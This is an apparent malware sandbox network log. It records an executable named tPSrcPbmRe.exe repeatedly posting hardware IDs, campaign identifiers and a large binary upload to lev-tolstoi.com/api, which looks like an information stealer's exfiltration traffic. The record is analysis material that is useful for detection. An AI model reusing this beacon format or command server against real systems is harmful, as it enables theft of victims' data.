                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1834&min_rtt=1834&rtt_var=688&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15988&delivery_rate=1591280&cwnd=212&unsent_bytes=0&cid=dea02acf7d511408&ts=834&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:09:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                  2024-12-23 06:09:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  5192.168.2.649730104.21.66.864436480C:\Users\user\Desktop\tPSrcPbmRe.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:09:32 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=O4QKLE92WLB
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 19921
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:09:32 UTC15331OUTData Raw: 2d 2d 4f 34 51 4b 4c 45 39 32 57 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 39 30 46 41 36 42 45 32 39 45 42 41 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4f 34 51 4b 4c 45 39 32 57 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4f 34 51 4b 4c 45 39 32 57 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4f 34 51 4b 4c 45 39 32 57 4c 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                  Data Ascii: --O4QKLE92WLBContent-Disposition: form-data; name="hwid"5590FA6BE29EBA19AC8923850305D13E--O4QKLE92WLBContent-Disposition: form-data; name="pid"3--O4QKLE92WLBContent-Disposition: form-data; name="lid"PsFKDg--pablo--O4QKLE92WLBCont
                                                                                                                                                                                                                                                                  2024-12-23 06:09:32 UTC4590OUTData Raw: 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: ?2+?2+?o?Mp5p_oI
                                                                                                                                                                                                                                                                  2024-12-23 06:09:33 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:09:33 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=360tmm4nl451jiq94lu1kbj0hs; expires=Thu, 17 Apr 2025 23:56:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eEsSWPlKS16wQFFTupj9U86qnobYQqXoV2GvRDNG8T5fFu7Uumtih3MI1ULRro8llORW4%2F9cEton8UuJt4JKwWR670CfwRvIHVH3pk4qMu0L0A1UQTgLa5ZhSbReiD1eMto%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f662ef18e128c84-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1798&rtt_var=700&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=20875&delivery_rate=1536033&cwnd=175&unsent_bytes=0&cid=6a6950bbb4566dbf&ts=947&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:09:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                  2024-12-23 06:09:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  6192.168.2.649740104.21.66.864436480C:\Users\user\Desktop\tPSrcPbmRe.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:09:34 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=U852JZ4VHFZ4M1T2B
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 1226
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:09:34 UTC1226OUTData Raw: 2d 2d 55 38 35 32 4a 5a 34 56 48 46 5a 34 4d 31 54 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 39 30 46 41 36 42 45 32 39 45 42 41 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 38 35 32 4a 5a 34 56 48 46 5a 34 4d 31 54 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 38 35 32 4a 5a 34 56 48 46 5a 34 4d 31 54 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                                                                                                                                                                                  Data Ascii: --U852JZ4VHFZ4M1T2BContent-Disposition: form-data; name="hwid"5590FA6BE29EBA19AC8923850305D13E--U852JZ4VHFZ4M1T2BContent-Disposition: form-data; name="pid"1--U852JZ4VHFZ4M1T2BContent-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                                                                                                                                                                                  2024-12-23 06:09:35 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:09:35 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=6kkao9kp5ci3sbr117np4qtshp; expires=Thu, 17 Apr 2025 23:56:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTpqFJF4VYbI5jySCvP%2FsYkdUBa0bUCs9BcLYqhC5s3ksfk2KmSHYWIYG%2FMBp0XKKoGMVNW6gjMdta%2BMsiLF0%2BXpnEhHaOJdXH29yM4iThrgRuTJxNvopWhs%2BUePHWmud3Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f662f0298df438a-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1576&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2141&delivery_rate=1803582&cwnd=210&unsent_bytes=0&cid=f7d39b5b7c9fd19d&ts=772&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:09:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                  2024-12-23 06:09:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  7192.168.2.649747104.21.66.864436480C:\Users\user\Desktop\tPSrcPbmRe.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:09:37 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=6E5DHM678T6
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 572684
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:09:37 UTC15331OUTData Raw: 2d 2d 36 45 35 44 48 4d 36 37 38 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 39 30 46 41 36 42 45 32 39 45 42 41 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 45 35 44 48 4d 36 37 38 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 45 35 44 48 4d 36 37 38 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 36 45 35 44 48 4d 36 37 38 54 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                  Data Ascii: --6E5DHM678T6Content-Disposition: form-data; name="hwid"5590FA6BE29EBA19AC8923850305D13E--6E5DHM678T6Content-Disposition: form-data; name="pid"1--6E5DHM678T6Content-Disposition: form-data; name="lid"PsFKDg--pablo--6E5DHM678T6Cont
                                                                                                                                                                                                                                                                  2024-12-23 06:09:37 UTC15331OUTData Raw: 04 a5 86 97 9d 45 04 5c 26 b2 2e 78 24 a9 ba a5 09 05 f1 3f 14 30 7e e0 46 9d ce 24 44 62 c8 7c d4 b7 41 85 ad 7c 89 90 96 16 eb 0a 23 44 46 c8 40 25 f1 64 94 5e 2b cf 77 17 9b 8e 2c 52 81 02 b8 b6 6a 2d 1b 71 40 4b a0 d9 36 88 8f 45 8a 1b be 8d 1f 0a ab e8 41 d5 d8 0c 5a 67 56 da f1 b6 8e cb 19 c9 ae bd 44 13 d2 43 f5 b7 ca 95 f7 49 3f ac d8 06 d3 60 7c aa db 8a 12 e5 1d c7 b7 8b e7 f6 11 24 f0 ac 7e 95 43 58 1a fd 92 97 f0 47 fb b2 7d 19 71 30 6a ac 0b 61 ff f1 14 01 5e 9d 76 55 2d 59 cb 51 45 fb bb 7a 37 d9 49 6e b0 7f f7 8d ec 07 d7 da 38 03 37 d2 37 eb 54 5a 26 6d 28 57 cd 4f e0 56 49 71 bc 87 1a c7 1d 52 dc 2e f4 86 19 a5 22 ab c1 56 5b f4 79 7d 7a e0 9e 98 cd ab 69 e9 12 21 54 f9 73 23 85 1b 67 45 d1 97 6c 92 63 00 8b 88 ba e4 d4 5d 88 cf 27 6a 01
                                                                                                                                                                                                                                                                  Data Ascii: E\&.x$?0~F$Db|A|#DF@%d^+w,Rj-q@K6EAZgVDCI?`|$~CXG}q0ja^vU-YQEz7In877TZ&m(WOVIqR."V[y}zi!Ts#gElc]'j
                                                                                                                                                                                                                                                                  2024-12-23 06:09:37 UTC15331OUTData Raw: b3 44 25 f9 29 2f ec 48 7e a6 8b 5e 2c 9f 1c ec 2f 76 1b 6a 2a 1d f6 52 f5 0c 6a d7 2f 37 c0 03 22 fd df f0 2f b3 7a 66 65 c3 e1 0f 6e 2c dc 0d f0 f7 19 7f 54 b7 cb e0 56 3f 0e 03 73 2a 95 99 87 ed 89 3d 54 46 dd ee b8 63 20 3b d1 53 8d 4a 15 c4 ac 5b a3 85 70 db 02 04 de ab 0e 4c f8 3d ce 62 c8 32 d7 bc a7 a7 76 52 b3 03 4e 3c 68 5f a5 f8 26 14 be a7 23 44 73 2b a8 a7 e4 dc 65 c9 40 8d 75 a8 30 00 ff cc 16 b7 91 c2 46 f3 10 b4 d0 82 db 1a 02 05 d2 94 de 23 20 d6 90 d1 64 9b fa ba cf 88 f0 26 a8 82 37 36 eb c7 37 ef ad 9c c7 77 db fd 55 fc 86 cc d6 ed 7f dc aa 3d 5f f4 8a 15 b6 db 32 5f 9c d0 7b 70 31 07 cc ff 79 77 e7 c9 c7 30 c6 b0 6e a2 da 20 b7 5f e0 f3 6b 02 a8 b1 b1 ae 76 0c 3c 70 22 3f e8 47 a4 8c e6 ac 28 22 1d 22 e8 fc 20 e6 da 78 dd 61 a8 b3 25
                                                                                                                                                                                                                                                                  Data Ascii: D%)/H~^,/vj*Rj/7"/zfen,TV?s*=TFc ;SJ[pL=b2vRN<h_&#Ds+e@u0F# d&767wU=_2_{p1yw0n _kv<p"?G("" xa%
                                                                                                                                                                                                                                                                  2024-12-23 06:09:37 UTC15331OUTData Raw: 06 c8 7f 62 3a c5 19 6d 97 b7 32 db 73 69 3b 45 b3 4b 36 08 e1 ab eb 57 12 bf 6d 59 f7 3e ba e7 3e 45 3f 43 2b 21 2f af ec ca 4c 6f c6 f0 fd a8 ff a1 07 8a 5a 8b 34 e8 e4 94 fa 8c 5f 7b 0f e0 49 f1 26 85 a7 9c bc f7 fe 06 9e cf e7 85 b1 58 e0 3f ed 56 e6 f3 75 39 d6 ed 8f e1 04 c7 61 33 4f 46 b9 48 e0 43 84 55 a7 71 30 b8 10 93 b4 4c ae ae 12 8e b6 7f 5f db 9a c1 0e 7b 1d 9e 5d 8c be c5 11 7d a5 78 7f 66 78 70 a3 af eb 99 ae 5d 95 2e f3 d1 ad 93 7d 2e 4c 26 f1 5a e6 2f 91 20 17 39 a6 0b a0 48 6c 91 b9 0d ff 08 d8 59 fc ae d7 e7 6d 6e 0d 4d c0 58 67 62 c9 9a e7 2f 86 da b4 6b 25 84 50 b6 77 f9 43 0d 43 ab 16 23 c7 90 b8 e8 e6 15 41 36 63 11 f5 e8 e8 44 fb d7 f3 e9 0e 18 3b d9 47 f5 4e 45 e4 2e 8d c0 51 eb 4a ed eb 28 ae 66 de f7 35 79 ff 66 1a 4a 3c 4d 4f
                                                                                                                                                                                                                                                                  Data Ascii: b:m2si;EK6WmY>>E?C+!/LoZ4_{I&X?Vu9a3OFHCUq0L_{]}xfxp].}.L&Z/ 9HlYmnMXgb/k%PwCC#A6cD;GNE.QJ(f5yfJ<MO
                                                                                                                                                                                                                                                                  2024-12-23 06:09:37 UTC15331OUTData Raw: 54 84 0d ec 77 14 21 3e b1 74 45 f6 d5 fb 4f 33 f2 9a 4e 10 bd 56 76 b7 29 83 80 a3 8a a9 3f 52 6a 4c 4b 30 1e 8a 58 08 2f 47 e9 45 e4 af 00 68 09 7f 78 47 18 b4 73 37 b6 0b d6 47 04 5e c4 af 4b 72 d0 15 e6 42 d8 01 d8 b3 be e9 a2 5c c3 03 99 03 1b 65 fa e1 91 bc a2 1d fb 49 57 b7 72 1e 84 79 11 bb 18 b7 eb 90 a5 8d 5c 54 02 97 7f 92 cd 01 d4 8e 19 b0 51 74 b9 b6 9e 99 be e2 fe b2 f2 d6 b8 8b ed 09 fb 0b 11 0e 59 0f 24 0a f9 7f 20 8b 29 36 dd 4b fc 4f 6e 47 2b d5 89 2f 3a e8 92 a4 70 97 a3 ed bb 57 99 fe be da 6d f3 56 a5 96 76 99 2d a0 4e 7e e8 67 bb 60 bc 36 a4 63 62 f4 bf 8e 4f 9a d1 64 fb 5c 5b f0 79 a7 0c b8 f6 58 e6 e8 79 30 c9 66 f1 34 dc d5 37 4c 6e b3 3e f7 d5 f0 f4 0f d3 1a db 9f 8b ff 3e fc d9 36 22 72 3a fc 34 02 f9 55 cd 46 a9 da 34 85 51 b1
                                                                                                                                                                                                                                                                  Data Ascii: Tw!>tEO3NVv)?RjLK0X/GEhxGs7G^KrB\eIWry\TQtY$ )6KOnG+/:pWmVv-N~g`6cbOd\[yXy0f47Ln>>6"r:4UF4Q
                                                                                                                                                                                                                                                                  2024-12-23 06:09:37 UTC15331OUTData Raw: 68 c4 98 c7 41 49 cc f4 b8 be 1b c2 ab d7 76 72 9f de 1a 92 a5 53 ec 8e d6 91 c8 59 f7 a9 06 42 f3 52 03 57 87 63 35 41 5d 89 3f fa cb fe 54 59 69 81 99 dc 69 31 db 36 54 a3 2f 0a 65 1b d2 92 57 02 7c 28 bf 8c 93 82 a9 2d 76 8c 23 31 3e c5 f0 1e a9 f9 57 ef 17 4f ce e1 35 9e c8 b6 b8 c6 fd 52 d5 20 be 4e b6 76 8a f6 13 bc e1 9c 95 20 b4 f8 a3 6d 4e 2d 6b 24 cd 24 fd 57 5e 22 75 f6 cc 10 cf fb 4a 8f 8b 0a 10 86 cc a7 77 75 f7 d0 34 17 59 c6 b9 cc 72 b9 43 0e 91 bf df 53 9a c2 cb 8c 1a 3f cb ee d3 4e 7c ed 02 1b 63 83 fd c0 1b 6c 2a 22 82 72 4e 98 94 e3 dd f5 f1 2b bb 74 a2 2f 6a a4 0e 91 2d 47 67 a8 d3 06 8d f2 4d 41 af 0a bc d4 07 15 ff 79 4e 33 d8 20 8a dd 2a c5 6c 2d 36 b6 1b 8c d1 00 90 f6 68 30 d6 35 e0 87 ca b0 bd db 67 94 19 b3 d2 5a 48 5b ad 36 8e
                                                                                                                                                                                                                                                                  Data Ascii: hAIvrSYBRWc5A]?TYii16T/eW|(-v#1>WO5R Nv mN-k$$W^"uJwu4YrCS?N|cl*"rN+t/j-GgMAyN3 *l-6h05gZH[6
                                                                                                                                                                                                                                                                  2024-12-23 06:09:37 UTC15331OUTData Raw: c9 7f 4e 6f 3d f4 9f c0 dd 03 1e 86 da c8 54 fe 34 64 6b c8 19 79 62 df a8 40 9a ff be ce d6 91 59 fb c7 fe 46 fe fc 74 4b 25 b8 24 69 47 a7 93 63 ba 90 36 af f6 fe 98 b2 17 a0 62 23 50 b8 02 38 e2 35 5e 00 c2 42 c0 42 c6 22 a7 a4 93 1d 29 d9 d9 c2 bd 78 b5 8a 2d 8e c3 b8 eb 08 17 b6 dd e1 7f 6b 33 ea 70 93 17 75 34 c6 cf 08 80 72 00 35 eb fe b9 09 21 a0 f8 be 34 90 e0 2d a3 c0 59 b4 eb 5e e4 df a7 83 85 cb bc 90 87 c3 0e c5 3c 22 d8 52 2e d5 ef e9 b9 68 10 0e d1 c4 31 97 04 e3 0c 57 1f 7f fe ef 1c 95 6a 66 2a 15 d7 88 f0 0f 41 6d 0f c7 bb 54 17 43 4d 66 db ef 1d ac f6 32 d4 e9 e7 ca 76 87 39 b2 77 f0 05 8b ed f5 cc f7 78 6f 75 c2 31 b7 14 1c ca bc 04 fc fe d3 88 17 0d bd 31 95 a8 64 4e f8 47 92 51 fa e3 4d 57 e5 b0 e0 0f 2a 97 4b 36 bd 9d c7 71 0b 21 80
                                                                                                                                                                                                                                                                  Data Ascii: No=T4dkyb@YFtK%$iGc6b#P85^BB")x-k3pu4r5!4-Y^<"R.h1Wjf*AmTCMf2v9wxou11dNGQMW*K6q!
                                                                                                                                                                                                                                                                  2024-12-23 06:09:37 UTC15331OUTData Raw: da 2c 4c 0d 91 02 6f 9c db a3 4c 12 81 cf 2e 9b 02 c3 97 e2 e8 6d 8b 3f 7e 46 75 1b 39 3d ed 64 2d dc ee a9 34 72 c4 4f 74 6b f5 ee 85 e5 9f 83 42 19 38 58 cb cf d1 37 b0 13 e0 48 1d d2 ba c8 a2 47 8c 21 3d 0f 8d dd f8 5a f3 b3 81 3a 6a 7e 8e 0f 4d 21 70 7e 02 47 3b 76 c3 a4 88 2e 79 30 f2 ab 14 82 f2 ed 63 c8 e0 80 10 2b 7e 42 29 b2 9b a7 d2 80 84 b5 0b cb cc 74 88 23 e4 a1 fc 6c bd ed eb b7 41 e6 6d b0 75 22 4f 1b 30 5e d9 df b0 33 ce 59 55 5c dc 8c 31 c1 be c2 61 01 6e 0d 9c 42 c6 f5 ef 14 70 94 a1 8a 14 84 30 17 0e dd fe 64 f8 d9 bc 09 05 56 0b e5 ef fc a4 7c 12 b6 c9 f1 8a b1 60 2d 73 1a 3f 7e 1c 96 37 8c 33 59 5a 6e 6e aa c7 62 22 f1 ae 9c cd 6c 11 9d 09 ea ce 97 a0 48 84 35 fe 7c c7 29 3e ca 63 7c e1 6e 10 df 8e 9f de a8 87 e2 db 6f fb d5 66 c1 67
                                                                                                                                                                                                                                                                  Data Ascii: ,LoL.m?~Fu9=d-4rOtkB8X7HG!=Z:j~M!p~G;v.y0c+~B)t#lAmu"O0^3YU\1anBp0dV|`-s?~73YZnnb"lH5|)>c|nofg
                                                                                                                                                                                                                                                                  2024-12-23 06:09:37 UTC15331OUTData Raw: 97 0f 2d bc 38 ca a6 21 10 ba c2 f4 53 80 1a b0 d0 de 14 e9 7c 8c 86 e1 d3 1b d1 6a cd 8d ec 8d 18 31 0c 8f 41 c5 05 90 c5 f7 ff 79 18 57 2f ea c3 db da cc ba ed 68 ba a3 c9 62 01 83 93 ad db d1 14 27 29 26 02 a9 6e 84 15 93 30 58 d1 22 ec de f3 8d 77 21 41 48 20 fb d6 f9 00 92 e2 76 35 94 a4 16 21 71 6d df 9f 3c 42 8a bf 7b 2c 99 a7 1b 2e 2a 0b 00 88 db b9 94 13 a5 86 a5 6b 1b a0 1c d4 ea ae 6e be da d3 11 65 19 86 cf 7f 4e 6c 80 1b b6 b2 a3 2d 97 af a5 c3 65 2e 41 87 9a 95 c7 37 21 0e b4 76 f9 13 2a 89 04 ef f3 d6 c9 6e a8 53 29 ef f7 e5 67 ed 42 9c c2 3a f5 cf 3d c2 ae 5f 5c 49 9d 18 b9 c9 74 fe 91 80 8f 22 98 08 a6 f8 d2 ba 65 e3 f5 00 c1 18 25 2b 3f be 19 a8 38 71 f9 52 56 ab 98 d0 41 55 d1 95 5d b3 27 75 bc 5d c9 7d aa 0a c4 ac f2 2d f4 56 a7 a4 77
                                                                                                                                                                                                                                                                  Data Ascii: -8!S|j1AyW/hb')&n0X"w!AH v5!qm<B{,.*kneNl-e.A7!v*nS)gB:=_\It"e%+?8qRVAU]'u]}-Vw
                                                                                                                                                                                                                                                                  2024-12-23 06:09:37 UTC15331OUTData Raw: a5 fa 23 68 f0 53 28 1d 4e 71 b8 c2 9f 74 dc 2d 88 fb ae d5 d3 49 8e 5c 32 69 25 48 90 e0 3c fc 62 29 00 d0 93 28 16 0a 1b ef 03 23 24 6e fd 7a 72 7e 8c 27 70 82 20 4b 97 c2 ec 7c 35 18 21 dd 6a 9a ef 42 67 aa 2a 78 a9 e6 30 42 14 dd ac 71 1f a3 2a bb 44 89 ce be 83 d2 52 92 e7 68 52 1c 51 11 be 8f 2c 6d 08 e7 4a a6 44 08 80 b3 ec e7 48 a5 84 95 13 4e f0 ce e8 50 7b b5 fa f0 7f 4f 21 de db 8f c0 d2 23 3a b6 fc 66 e9 9b 27 8a b5 93 28 54 29 d0 57 8f 05 f8 3c 80 10 af de c3 50 a6 2b 27 5b 28 5d d5 0b d1 8e 36 13 04 ab e7 3c eb 9c e0 6c c1 4d 12 be de fc 40 a4 ec e6 f6 59 2b 76 aa a8 47 be 15 82 52 9e 2c 4b 4e ef 6f fe 23 22 15 31 a9 c1 4b 63 17 10 32 5a f8 20 e8 96 93 5f e0 ac e8 ec b7 d5 e6 cd d0 5b 13 f1 1b 62 d3 53 26 e8 ad 7c 13 07 e6 2d a6 75 59 a6 a5
                                                                                                                                                                                                                                                                  Data Ascii: #hS(Nqt-I\2i%H<b)(#$nzr~'p K|5!jBg*x0Bq*DRhRQ,mJDHNP{O!#:f'(T)W<P+'[(]6<lM@Y+vGR,KNo#"1Kc2Z _[bS&|-uY
                                                                                                                                                                                                                                                                  2024-12-23 06:09:40 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:09:40 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=kh8tdgmf9nalnckgqnqhgg4pd4; expires=Thu, 17 Apr 2025 23:56:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
